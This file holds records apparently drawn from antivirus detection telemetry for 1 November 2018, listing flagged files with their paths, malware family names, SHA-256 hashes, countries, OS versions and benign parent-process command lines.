  Row(detection=Row(filename='avscan-20181101-155342-aa9c7d12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155342-AA9C7D12', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='--______--_-----__-_-_-___------____----_---_--_______-.{36b3b00f-6aaa-4b71-a6c3-9d0ace89d5ba}', filepath='E:\\FEBRUARY.FINEL.2017\\8.02.2017\\7x5\\--______--_-----__-_-_-___------____----_---_--_______-.{36B3B00F-6AAA-4B71-A6C3-9D0ACE89D5BA}', filesize=7236000, name='WORM/Lodbak.Gen4.#M2.#R300496'), hash='0399d1d7c1499f388d77e037013ae39881091de6f3152f6d8a8428d417a81e64', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:31:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='basic.exe', filepath='\\\\?\\G:\\Hooshmand\\CH_ENGLISH\\basic\\basic.exe', filesize=3072000, name='HEUR/APC.#M1.#R1'), hash='1bb80ab49f64b178fc3a25b4982c17162a65ff43a170e010b740c70e00a4c989', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T12:43:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181459-4452d6b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b5c35b4\\AVSCAN-20181101-181440-40D73321\\AVSCAN-20181101-181459-4452D6B2', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:14:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='eba5a2a297ae9a87ab386237612b475951796bd92eb11ece2ae5fc1f128ffa13', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0009007.exe', filepath='E:\\System Volume Information\\_restore{A4CD1BA6-AFFB-49F1-B07A-11D120EF301F}\\RP11\\A0009007.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='ad4ba38719feb95550055a5b87c24f73b5ccf141c6cf77dce5cf87895ba6cd94', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:15:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e39a45bd02dddde6e513e3570d59fb25560d8c311824d3694758ed30b35555af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\E39A45BD02DDDDE6E513E3570D59FB25560D8C311824D3694758ED30B35555AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e39a45bd02dddde6e513e3570d59fb25560d8c311824d3694758ed30b35555af', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:47:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='愤怒的小鸟星球大战2.exe', filepath='C:\\Program Files\\fennudexiaoniaoxingqiudazhan2\\愤怒的小鸟星球大战2.exe', filesize=1024000, name='HEUR/AGEN.1004654.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='photoshop.exe', filepath='E:\\school\\Local\\ดาวน์โหลดตัวอย่างแผน\\photoshop\\photoshop.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='c2860813420dcbd91ccea720a8b4a898484161de6175124c11528801905bdc47', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7349011.exe', filepath='\\\\?\\C:\\Program Files (x86)\\gzpem\\7349011.exe', filesize=1024000, name='Adware/CsdiMonetize.dxckt.#M1.#R1'), hash='ce7558dac4c120340a90ea7e57498f2e5b5d40aa5f3ed1ee6c161bdfcd1b8009', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143753-cc77908c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_65e44405\\AVSCAN-20181101-143719-C5DFD252\\AVSCAN-20181101-143753-CC77908C', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:37:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='enutstpp.dll', filepath='C:\\Program Files\\Common Files\\L&H\\SpeechEngines\\1033\\TTS\\TTS3000\\ENUTSTPP.DLL', filesize=324000, name='W32/Ramnit.C.#M1.#R1'), hash='da7b008983ffa662cfc78cacdf1b6ba595ad47cb2081ae690ae5be7902cd5289', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:44:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141245-e70321be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_103c7217\\AVSCAN-20181101-141146-DA744C4C\\AVSCAN-20181101-141245-E70321BE', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:12:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cardrecovery.exe', filepath='K:\\HBCD\\Programs\\CARDRECOVERY.EXE', filesize=64000, name='BDS/Rogue.766012.#M1.#R1'), hash='d809a1cf78a0751b6980abcbb83f400d51e369658aefe4ec3acc97bf43fd79af', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=3933184, timestamp='2018-11-01T17:00:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.android.gallery3d.exe', filepath='G:\\Android\\data\\com.android.gallery3d.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-103405-0f6b0866', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27d3c769\\AVSCAN-20181101-103330-0B109C9C\\AVSCAN-20181101-103405-0F6B0866', filesize=256000, name='TR/Qadars.DW.#M1.#R1'), hash='eeb05cb6449871a2c95dc56268ad0a29828a440b1bfe728ae9d8b7b178fcabf6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:04:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Pixologic ZBrush 4R8 P2 x64 - ENG (11 Agosto 2017) by GRISU\\Pixologic ZBrush 4R8 P2 x64 - ENG (11 Agosto 2017) by GRISU\\Update 2\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-01T11:02:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152529-70a4b110', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0db57455\\AVSCAN-20181101-152418-685B5584\\AVSCAN-20181101-152529-70A4B110', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2160000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9de49d033715d614b112839ff4b9628c8d2ff63c3ba6437d44da61bd5513dd29', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T13:25:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='du phong truot gia.xls', filepath='C:\\Users\\X\\Dropbox\\4. VINH LOC _ 2018\\7. TRINH PHE DUYET THIET KE\\6. Trinh phe duyet Lan 3 _ 26.10.2018\\HO SO THIET KE VINH LOC _ LAN 3\\TDT-Tom Lua (tham dinh lan 5)\\TDT-Tom Lua (tham dinh lan 5)\\Du phong truot gia.xls', filesize=448000, name='X2000M/Laroux.FO.#M1.#R1'), hash='d77a7e6233100169ef698cd15376e94a8b70a2e8ad013b22308124f6c3a6d201', metadata=Row(cmdline='\\\\\\/systemstartup', country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-01T12:56:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142109-ae2bd7a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142109-AE2BD7A9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:49:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Library/Application Support/Malwarebytes/MBAM/Quarantine/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='GB', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:29:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211614-06ee3b49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c35755c0\\AVSCAN-20181101-205617-602DFCFE\\AVSCAN-20181101-211614-06EE3B49', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='cd2a73795bcd963999c929a1ad3f17695eb7e5773effdc96473fca2dc8cc20de', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:46:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='enviacargaredecard.exe', filepath='C:\\Users\\X\\Desktop\\FINANCEIRO\\Pastas Diversas\\Backup SiTef\\2016-04-01-SiTef\\APLIC.WIN\\enviacargaredecard.exe', filesize=128000, name='W32/Sality.Y.#M1.#R1'), hash='e9edf33dfd617ac9a998b1dc917665dc643a5d140b17963a04f08a50b7d41ec5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe24_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe24 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:40:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111830-33a649e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111830-33A649E0', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:18:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gpusniffer.exe', filepath='C:\\Program Files (x86)\\Adobe\\Adobe Audition CS6\\GPUSniffer.exe', filesize=100000, name='W32/Sality.AT.#M1.#R1'), hash='194728e585494a63ef409177dd1058087fedabc08a76dfe6fc6f74cf585a65ba', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:vDHioZqKxUmavx89.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:43:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-221708-ca36214e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed0c00ee\\AVSCAN-20181101-221035-8146EDBC\\AVSCAN-20181101-221708-CA36214E', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:17:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.930\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.930\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:35:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231515-b0eddf1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_22556673\\AVSCAN-20181101-231501-AF3910EA\\AVSCAN-20181101-231515-B0EDDF1A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231232-8965629c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_487bb02a\\AVSCAN-20181101-231211-86695D10\\AVSCAN-20181101-231232-8965629C', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:12:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000af513', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000af513', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:51:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmn -1.xls', filepath='\\?\\D:\\Du lieu hoang\\cong ty thang long\\cong trinh Bac Giang\\GUI HOANG\\TRINH LAN 2\\du toan tcbp\\NMN -1.xls', filesize=704000, name='X2000M/Laroux.FO.#M1.#R1'), hash='4de44102a2ca5e99c761da35405060cd1f3eed3fdac492780fbc561b3a221b94', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:38:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='58f021cea1ae504e44104b94746b402d8a701c6d3097aa6ac0a0d4c59da9ce2c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\58F021CEA1AE504E44104B94746B402D8A701C6D3097AA6AC0A0D4C59DA9CE2C', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='58f021cea1ae504e44104b94746b402d8a701c6d3097aa6ac0a0d4c59da9ce2c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:28:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc68501c11-a5c4-3149-815b-14074d76f8b3.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc68501C11-A5C4-3149-815B-14074D76F8B3.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T00:09:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX15.056\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX15.056\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:18:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000a8bec', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000a8bec', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:49:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='64229b8a6ba1cbb4cf553745ca46ffa892af37a165022297c29e423db48ec752', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\64229B8A6BA1CBB4CF553745CA46FFA892AF37A165022297C29E423DB48EC752', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='64229b8a6ba1cbb4cf553745ca46ffa892af37a165022297c29e423db48ec752', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:39:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184012-5b1ecc2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-184010-5AB5C540\\AVSCAN-20181101-184012-5B1ECC2D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:40:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:26:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='brh.dll', filepath='C:\\Windows\\Temp\\nsm818.tmp\\brh.dll', filesize=960000, name='HEUR/AGEN.1034999.#M1.#R1'), hash='7643b17b3d571bd272f3284bf57eec71dac66c207f7602b0f063aec1c38aea92', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=9773272, timestamp='2018-11-01T15:33:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171930-10e2c258', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-171930-10E2C258', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:19:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:07:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T15:57:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='passwords.exe', filepath='I:\\.Trashes\\Passwords.exe', filesize=512000, name='TR/Dropper.Gen.#M300.#R241'), hash='83ef079fb538f232884ca1f3c64ad14e939d3ddcf013d1089320abc77477beab', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:21:17Z'), dt=datetime.date(2018, 11, 1)),
